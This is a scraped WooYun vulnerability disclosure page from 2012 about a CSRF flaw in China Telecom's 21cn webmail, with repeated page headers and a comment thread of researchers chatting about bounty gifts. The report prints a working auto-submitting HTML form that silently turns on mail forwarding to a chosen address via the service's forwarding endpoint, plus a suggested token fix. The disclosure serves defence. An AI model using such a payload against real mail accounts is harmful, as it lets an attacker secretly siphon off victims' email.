电信21cn邮箱csrf自动转发邮件 | wooyun-2012-016294| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-016294

漏洞标题：电信21cn邮箱csrf自动转发邮件

漏洞作者：小胖胖要减肥

提交时间：2012-12-21 09:20

修复时间：2012-12-26 09:20

公开时间：2012-12-26 09:20

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-12-21：细节已通知厂商并且等待厂商处理中
2012-12-26：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

我承认很低级的，慢慢学吧，但确实电信的东西太不靠谱，就当实践下，危害很明显，还号称第一个企业邮箱

详细说明：

设置自动转发功能，查看post，直接无绑定用户无token接口，post数据相当简单，直接构造html尝试

<html>
<body>
<form id="wrhoooo" name="wrhoooo" action="http://hermesw7.mail.21cn.com/webmail/optionForward.do" method="post">
<input type="test" name="active" value="true" />
<input type="test" name="addresses" value="w*******i2@21cn.com" />
<input type="test" name="backup" value="false" />
</form>
<script>
document.wrhoooo.submit();
</script>
</body>
</html>

漏洞证明：

然后查看邮箱是否已经设置自动转发

然后发一封邮件给末尾为1的账号，查看末尾为2的邮箱，确实收到转发邮件

修复方案：

设定一个token放在post信息里，一定要验证token是否和cookies当前用户对应而不是只验证token是否有效，这个token最好是外部用户无法获得的

版权声明：转载请注明来源小胖胖要减肥@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2012-12-26 09:20

厂商回复：

漏洞评价：

2012-12-21 09:29 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

胖哥很热血呀
2012-12-21 09:37 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

@Clar 好好学习
2012-12-24 16:58 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

@小胖胖要减肥话说你收到快乐购的礼物了么？
2012-12-24 16:59 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

@se55i0n 没有反正他们的mm加我了没有我找她去
2012-12-24 17:00 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

@小胖胖要减肥还有妹子加你~那肯定有了~我都直接问他们要了呵呵
2012-12-24 17:05 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

。。。。。反正以前给地址的也没收到过，哎
2012-12-24 17:07 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

@小胖胖要减肥 ...这种情况我遇到过，但是第二次发他们洞，果断就有礼物了~话说我下午刚收到雪球的礼物~：D
2012-12-24 17:08 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

@se55i0n 什么礼物啊，哎没有礼物的孩纸更要好好学习
2012-12-24 17:10 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

@小胖胖要减肥哈根达斯的券和礼品卡~价值好几千...................................................................角，哈哈
2012-12-24 17:12 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

@se55i0n 这个。。。。。。我只能说看我嘴型，不过掌握这类漏洞的测试方法找到漏洞的感觉也蛮爽的
2012-12-24 17:15 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

@小胖胖要减肥跟你一样，撸力学习中~
2012-12-27 22:05 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

@cncert国家互联网应急中心你们把这个漏掉了通知下把
2012-12-27 22:34 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

哇噢！漏出来了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-016294

漏洞标题：电信21cn邮箱csrf自动转发邮件

相关厂商：21CN邮箱

漏洞作者：小胖胖要减肥

提交时间：2012-12-21 09:20

修复时间：2012-12-26 09:20

公开时间：2012-12-26 09:20

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小胖胖要减肥@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-016294

漏洞标题：电信21cn邮箱csrf自动转发邮件

相关厂商：21CN邮箱

漏洞作者： 小胖胖要减肥

提交时间：2012-12-21 09:20

修复时间：2012-12-26 09:20

公开时间：2012-12-26 09:20

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-016294"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小胖胖要减肥@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小胖胖要减肥

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小胖胖要减肥@乌云